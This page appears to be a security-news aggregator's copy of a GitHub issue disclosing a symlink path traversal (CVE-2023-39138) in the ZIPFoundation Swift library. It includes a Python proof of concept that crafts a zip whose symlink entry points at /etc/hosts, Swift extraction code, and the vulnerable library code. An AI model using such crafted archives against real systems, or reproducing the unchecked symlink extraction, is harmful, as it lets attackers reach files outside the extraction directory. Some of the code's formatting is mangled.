Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39138: Symlink path traversal vulnerability · Issue #282 · weichsel/ZIPFoundation

An issue in ZIPFoundation v0.9.16 allows attackers to execute a path traversal via extracting a crafted zip file.

CVE
#vulnerability

Summary

The package does not check if symlinks are pointing to paths outside the extraction directory

Steps to Reproduce

1- Generate payload.zip using the following code:

import zipfile

def compress_file(filename): zipInfo = zipfile.ZipInfo(“.”) zipInfo.create_system = 3 zipInfo.external_attr = 2716663808 zipInfo.filename = filename

with zipfile.ZipFile('payload.zip', 'w') as zipf:
    zipf.writestr(zipInfo, "/etc/hosts")

filename = ‘evil_symlink’

compress_file(filename)

2- Extract payload.zip using unzipItem

import Foundation import ZIPFoundation

let fileManager = FileManager() var sourceURL = URL(fileURLWithPath: “/path/to/payload.zip”) var destinationURL = URL(fileURLWithPath: “/path/to/”)

do { try fileManager.createDirectory(at: destinationURL, withIntermediateDirectories: true, attributes: nil) try fileManager.unzipItem(at: sourceURL, to: destinationURL) } catch { print("Extraction of ZIP archive failed with error:\(error)") }

Expected Results

evil_symlink is not linked back after extraction

Actual Results

evil_symlink is linked back after extraction

Technical details

Upon extraction, the package passes the path coming from the zip entry directly to fileManager.createSymbolicLink without checking that it is located within extraction directory

case .symlink: guard !fileManager.itemExists(at: url) else { throw CocoaError(.fileWriteFileExists, userInfo: [NSFilePathErrorKey: url.path]) } let consumer = { (data: Data) in guard let linkPath = String(data: data, encoding: .utf8) else { throw ArchiveError.invalidEntryPath } try fileManager.createParentDirectoryStructure(for: url) try fileManager.createSymbolicLink(atPath: url.path, withDestinationPath: linkPath) } checksum = try self.extract(entry, bufferSize: bufferSize, skipCRC32: skipCRC32, progress: progress, consumer: consumer) }

Related news

GHSA-c2cc-3569-6jh2: Path traversal in ZIPFoundation

An issue in ZIPFoundation v0.9.16 allows attackers to execute a path traversal via extracting a crafted zip file.

CVE-2023-39139: Ostorlab: Mobile App Security Testing for Android and iOS

An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907